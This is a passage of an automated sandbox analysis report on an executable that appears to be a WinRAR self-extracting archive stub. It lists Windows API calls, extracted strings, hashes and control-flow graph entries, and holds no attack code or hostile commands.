                                                                                      • _memcmp.LIBVCRUNTIME ref: 00408870
                                                                                        • Part of subcall function 004080F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,004086E9,?,-00000930,?), ref: 004081BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharH_prologUpper_memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 4047935103-0
                                                                                      • Opcode ID: 8644dea7dd90d9d0dcb0ad9ec32607b6bc83ecbf229ce091f8f4b72909af33a9
                                                                                      • Instruction ID: ed9455dd345f3cf172517af0a44ea50c6d5855cc7d99124cd037af268590b978
                                                                                      • Opcode Fuzzy Hash: 8644dea7dd90d9d0dcb0ad9ec32607b6bc83ecbf229ce091f8f4b72909af33a9
                                                                                      • Instruction Fuzzy Hash: 94721B70504245AEDF15DF60C985BFA7769AF05304F0841BFE889BB2C3DB395A85CB68
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 369ae8b91fc30c096f104ed8bae41011c55f52051390716d4c8621b772ec02ea
                                                                                      • Instruction ID: b0a01614aa2493c05d0238137e6b8d6ffbb034026e74db866317788c2f10dc31
                                                                                      • Opcode Fuzzy Hash: 369ae8b91fc30c096f104ed8bae41011c55f52051390716d4c8621b772ec02ea
                                                                                      • Instruction Fuzzy Hash: 96D1D3B1608745CFCB14CF29C8847DBBBE0AF95308F08456EE8449B742D738E995CB9A
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00419B54
                                                                                        • Part of subcall function 004012E7: GetDlgItem.USER32(00000000,00003021), ref: 0040132B
                                                                                        • Part of subcall function 004012E7: SetWindowTextW.USER32(00000000,004302E4), ref: 00401341
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prologItemTextWindow
                                                                                      • String ID: !D$"%s"%s$*AD$*aD$*xE$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                      • API String ID: 810644672-1376706752
                                                                                      • Opcode ID: c3dd377082a04c0afc47a4a46e9c5adbca49641282bba88f413fda5fc62b1eb6
                                                                                      • Instruction ID: a060f55470dfea57963d31381489d9dc6aa3f9cd3f8b4e8441ac41b09f41bbb0
                                                                                      • Opcode Fuzzy Hash: c3dd377082a04c0afc47a4a46e9c5adbca49641282bba88f413fda5fc62b1eb6
                                                                                      • Instruction Fuzzy Hash: 8C42F371940305BAEB21AF609D49FEB3BA8AB16704F40007BF641B61D2D7BC4D94CB6E
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32 ref: 0040F36B
                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040F383
                                                                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0040F3A6
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0040F651
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040F669
                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040F67B
                                                                                      • ReadFile.KERNEL32(00000000,?,00007FFE,00430858,00000000), ref: 0040F69A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040F6F2
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0040F708
                                                                                      • CompareStringW.KERNEL32(00000400,00001001,004308A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 0040F762
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00430870,00000800,?,00000000,?,00000800), ref: 0040F78B
                                                                                      • GetFileAttributesW.KERNEL32(?,?,0C,00000800), ref: 0040F7C4
                                                                                        • Part of subcall function 0040F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0040F324
                                                                                        • Part of subcall function 0040F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0040DEC8,Crypt32.dll,?,0040DF4A,?,0040DF2E,?,?,?,?), ref: 0040F346
                                                                                      • _swprintf.LIBCMT ref: 0040F834
                                                                                      • _swprintf.LIBCMT ref: 0040F880
                                                                                        • Part of subcall function 00403F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00403F6E
                                                                                      • AllocConsole.KERNEL32 ref: 0040F888
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040F892
                                                                                      • AttachConsole.KERNEL32(00000000), ref: 0040F899
                                                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 0040F8BF
                                                                                      • WriteConsoleW.KERNEL32(00000000), ref: 0040F8C6
                                                                                      • Sleep.KERNEL32(00002710), ref: 0040F8D1
                                                                                      • FreeConsole.KERNEL32 ref: 0040F8D7
                                                                                      • ExitProcess.KERNEL32 ref: 0040F8DF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                      • String ID: C$$C$,C$0C$@C$DC$DC$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$\C$\C$`C$dwmapi.dll$kernel32$tC$uxtheme.dll$xC$xC$C$C
                                                                                      • API String ID: 1201351596-2325497224
                                                                                      • Opcode ID: 07e48d7f4da9327780b2520549f992f20d4961d0f7d647c363b49c247d8625ca
                                                                                      • Instruction ID: c5ec16332d21468965b7dae9243580e259513ee247f9db3461689cd90f44eb68
                                                                                      • Opcode Fuzzy Hash: 07e48d7f4da9327780b2520549f992f20d4961d0f7d647c363b49c247d8625ca
                                                                                      • Instruction Fuzzy Hash: B3D177B11083849BD734EF50D859B9FB7E8AF88704F10AA3FE58496680C7B89549CB5E
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0041AA4A
                                                                                        • Part of subcall function 004196EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 004197B4
                                                                                      • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,0041A35D,?,00000000), ref: 0041AB7F
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0041AC39
                                                                                      • DeleteFileW.KERNEL32(?), ref: 0041AC47
                                                                                      • SetWindowTextW.USER32(?,?), ref: 0041AD90
                                                                                      • _wcsrchr.LIBVCRUNTIME ref: 0041AF1A
                                                                                      • GetDlgItem.USER32(?,00000066), ref: 0041AF55
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0041AF65
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,0044412A), ref: 0041AF79
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0041AFA2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                      • String ID: %s.%d.tmp$*AD$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                      • API String ID: 3676479488-716100531
                                                                                      • Opcode ID: 622bf043dd8a76b352227d489a6219c6f2389bf2d8d2dc4de7251a3099a2ed5e
                                                                                      • Instruction ID: 8d689342b2fa41dfb6b0fc96890bb5a1e696d7e2e6358883b56aade1e1f54f01
                                                                                      • Opcode Fuzzy Hash: 622bf043dd8a76b352227d489a6219c6f2389bf2d8d2dc4de7251a3099a2ed5e
                                                                                      • Instruction Fuzzy Hash: 52E17172901229AAEF20EBA1DD45EDF737CEF05344F1040ABF505E7141EB789B948BA9
                                                                                      APIs
                                                                                        • Part of subcall function 0040C88E: _wcschr.LIBVCRUNTIME ref: 0040C8BD
                                                                                      • GetWindowRect.USER32(?,?), ref: 0040CF0E
                                                                                      • GetClientRect.USER32(?,?), ref: 0040CF1A
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040CFBB
                                                                                      • GetWindowRect.USER32(?,?), ref: 0040CFE8
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0040D007
                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D02E
                                                                                      • GetSystemMetrics.USER32(00000008), ref: 0040D036
                                                                                      • GetWindow.USER32(?,00000005), ref: 0040D041
                                                                                      • GetWindowTextW.USER32(00000000,?,00000400), ref: 0040D06C
                                                                                      • SetWindowTextW.USER32(00000000,00000000), ref: 0040D099
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0040D0AC
                                                                                      • GetWindow.USER32(00000000,00000002), ref: 0040D11E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                                                      • String ID: d
                                                                                      • API String ID: 4134264131-2564639436
                                                                                      • Opcode ID: 96f7ba82cad3894475a3ce3bd43f9f85c55c8d6cd92dd2559e924218854511db
                                                                                      • Instruction ID: 4c4d668eabaab6e196ac38b45d5c3418fdcc83312bd63ce0dbb7c09dd5a1c66b
                                                                                      • Opcode Fuzzy Hash: 96f7ba82cad3894475a3ce3bd43f9f85c55c8d6cd92dd2559e924218854511db
                                                                                      • Instruction Fuzzy Hash: 0F617F72208301AFD310DF69CD89E6FBBEAFBC9714F04552DF68492290C674E909CB56

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(00000068,00458958), ref: 0041B71D
                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00419325), ref: 0041B748
                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0041B757
                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,004302E4), ref: 0041B761
                                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0041B777
                                                                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0041B78D
                                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0041B7CD
                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0041B7D7
                                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0041B7E6
                                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0041B809
                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,00431368), ref: 0041B814
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$ItemShowWindow
                                                                                      • String ID: \
                                                                                      • API String ID: 1207805008-2967466578
                                                                                      • Opcode ID: cfdd689c34dfc6269b6f11cfe1c6fb5fbb63a90d10086bb70704fea4775c9d42
                                                                                      • Instruction ID: 6631bef3396d41285feac20f44f8eaee4ce7b707f09f9e7719080f9832114816
                                                                                      • Opcode Fuzzy Hash: cfdd689c34dfc6269b6f11cfe1c6fb5fbb63a90d10086bb70704fea4775c9d42
                                                                                      • Instruction Fuzzy Hash: FD2126712857447BE311EB249C45FAB7FDCEF82714F010629FB90A61D0D7A95908CAAB

Control-flow Graph

(Graph image omitted: function at 0041B9AA, calling ShellExecuteExW, ShowWindow, GetExitCodeProcess and CloseHandle.)
                                                                                      APIs
                                                                                      • ShellExecuteExW.SHELL32(000001C0), ref: 0041BAD8
                                                                                      • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 0041BB1D
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 0041BB55
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041BB7B
                                                                                      • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 0041BC0A
                                                                                        • Part of subcall function 00410B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0040AC49,?,?,?,0040ABF8,?,-00000002,?,00000000,?), ref: 00410B28
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                                      • String ID: $*QD$.exe$.inf
                                                                                      • API String ID: 3686203788-3162893476
                                                                                      • Opcode ID: f8536cb37a994040ae73b98f982a1ae57507ca6559871fba656a89ce7ca6d67d
                                                                                      • Instruction ID: 8731213ea26ecc7b6628077753aceb17293929b2abbdefd7acb9d7dce0091808
                                                                                      • Opcode Fuzzy Hash: f8536cb37a994040ae73b98f982a1ae57507ca6559871fba656a89ce7ca6d67d
                                                                                      • Instruction Fuzzy Hash: FF51B1705093809AD731AF21D9406EBB7A9EF85744F04081FE4C1936A5EBB9A9C4C7DA

Control-flow Graph

(Graph image omitted: function at 0040CACC, calling GetModuleFileNameW and several internal subroutines.)
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0040CAD1
                                                                                      • _wcschr.LIBVCRUNTIME ref: 0040CAEF
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0040CAB3,?), ref: 0040CB0A
                                                                                        • Part of subcall function 004106E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0040B25B,00000000,?,?,?,?), ref: 00410705
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
                                                                                      • String ID: *messages***$*messages***$R$a
                                                                                      • API String ID: 803915177-2900423073
                                                                                      • Opcode ID: 3cf54346dafddbf9a442e6f62d9e4e72b44aca791ba1dd71687e3651464213cb
                                                                                      • Instruction ID: 5d01c05e4704c8ac56468749e71a50d8e1f5d0d0108360dfdf889213d4f14061
                                                                                      • Opcode Fuzzy Hash: 3cf54346dafddbf9a442e6f62d9e4e72b44aca791ba1dd71687e3651464213cb
                                                                                      • Instruction Fuzzy Hash: 3391F3B1A00204DADB20DF68CC85BAE7BB4EF54304F10467FE649B72D2DA7C9985CB58

Control-flow Graph

(Graph image omitted: function at 004273AE, calling MultiByteToWideChar and WideCharToMultiByte.)
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00422FC2,00422FC2,?,?,?,004275FF,00000001,00000001,F5E85006), ref: 00427408
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004275FF,00000001,00000001,F5E85006,?,?,?), ref: 0042748E
                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00427588
                                                                                      • __freea.LIBCMT ref: 00427595
                                                                                        • Part of subcall function 004259FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,004223AA,?,0000015D,?,?,?,?,00422F29,000000FF,00000000,?,?), ref: 00425A2E
                                                                                      • __freea.LIBCMT ref: 0042759E
                                                                                      • __freea.LIBCMT ref: 004275C3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1414292761-0
                                                                                      • Opcode ID: dcc6473d045fc85726197919ff7012ef034d173e66d40c9374a644f373eaad3e
                                                                                      • Instruction ID: 405c3cb4200d2a4ef09c7e7971009558dd8d18f38ea0314e7ab169633d0257c0
                                                                                      • Opcode Fuzzy Hash: dcc6473d045fc85726197919ff7012ef034d173e66d40c9374a644f373eaad3e
                                                                                      • Instruction Fuzzy Hash: 7351F672704226BBDB258F65EC41EBFB7A9EB44750F95462AFC04D7241EB38DC80C698

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 0040F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0040F324
                                                                                        • Part of subcall function 0040F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0040DEC8,Crypt32.dll,?,0040DF4A,?,0040DF2E,?,?,?,?), ref: 0040F346
                                                                                      • OleInitialize.OLE32(00000000), ref: 0041904F
                                                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00419086
                                                                                      • SHGetMalloc.SHELL32(004420E8), ref: 00419090
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                      • String ID: riched20.dll$3Ro
                                                                                      • API String ID: 3498096277-3613677438
                                                                                      • Opcode ID: 81a575dfc482eb7b7c0b6440b9be245820986232f6daec58e8b095882a9cb13c
                                                                                      • Instruction ID: 86e76cd08599cf34ba9ba1d68dd7a0611f4fc9149205cef994b38ce33a66f2dd
                                                                                      • Opcode Fuzzy Hash: 81a575dfc482eb7b7c0b6440b9be245820986232f6daec58e8b095882a9cb13c
                                                                                      • Instruction Fuzzy Hash: E3F04FB1C40109ABD710AF9ADC49AEEFFFCEF84300F10406BE854E2210D7B85645CBA5

Control-flow Graph
APIs
  • Part of subcall function 0040FDC9: ResetEvent.KERNEL32(?,?,0040F9F3,011CE068,?,00441E74,00000000,0042F79B,000000FF,000001B8,0040FC8F,?,?,?,?,0040A5A0), ref: 0040FDE9
  • Part of subcall function 0040FDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,0040A5A0,?,?,?,?,0042F79B,000000FF), ref: 0040FDFD
• ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0040FA05
• CloseHandle.KERNEL32(?,?), ref: 0040FA1F
• DeleteCriticalSection.KERNEL32(?), ref: 0040FA38
• CloseHandle.KERNELBASE(?), ref: 0040FA44
• CloseHandle.KERNEL32(?), ref: 0040FA50
  • Part of subcall function 0040FAC7: WaitForSingleObject.KERNEL32(?,000000FF,0040FD0B,?,?,0040FD80,?,?,?,?,?,0040FD6A), ref: 0040FACD
  • Part of subcall function 0040FAC7: GetLastError.KERNEL32(?,?,0040FD80,?,?,?,?,?,0040FD6A), ref: 0040FAD9
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 1868215902-0
• Opcode ID: 2c8709d01f7cd723c43e4d76cef1dd8e6e7da27ce71b22203c29fcd16f0cbdad
• Instruction ID: 3715b6dcfb8934b65572b9403ae013098ac866517416dfe1dee09f13cbd97521
• Opcode Fuzzy Hash: 2c8709d01f7cd723c43e4d76cef1dd8e6e7da27ce71b22203c29fcd16f0cbdad
• Instruction Fuzzy Hash: 2D019231100744EFC7359F29ED54F86BBBAFB45710F00463AF26E929A0CB752804CB65

Control-flow Graph
control_flow_graph 896 418fc8-418fe7 GetClassNameW 897 418fe9-418ffe call 410b12 896->897 898 41900f-419011 896->898 903 419000-41900c FindWindowExW 897->903 904 41900e 897->904 899 419013-419016 SHAutoComplete 898->899 900 41901c-419020 898->900 899->900 903->904 904->898
APIs
• GetClassNameW.USER32(?,?,00000050), ref: 00418FDF
• SHAutoComplete.SHLWAPI(?,00000010), ref: 00419016
  • Part of subcall function 00410B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0040AC49,?,?,?,0040ABF8,?,-00000002,?,00000000,?), ref: 00410B28
• FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00419006
Strings
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: AutoClassCompareCompleteFindNameStringWindow
• String ID: EDIT
• API String ID: 4243998846-3080729518
• Opcode ID: 892810c594bdae6fb77f12eec890af469b37268b721b0b9cbdf38c949f5a4460
• Instruction ID: 69ceae9a1c066a59314dfb3f5486278fbca3fcf2f55137808cf2595577e5686a
• Opcode Fuzzy Hash: 892810c594bdae6fb77f12eec890af469b37268b721b0b9cbdf38c949f5a4460
• Instruction Fuzzy Hash: CCF08933A4122877E7306A655C05FDB766C9B49B51F040066FD40F2181D764ED51C6EE

Control-flow Graph
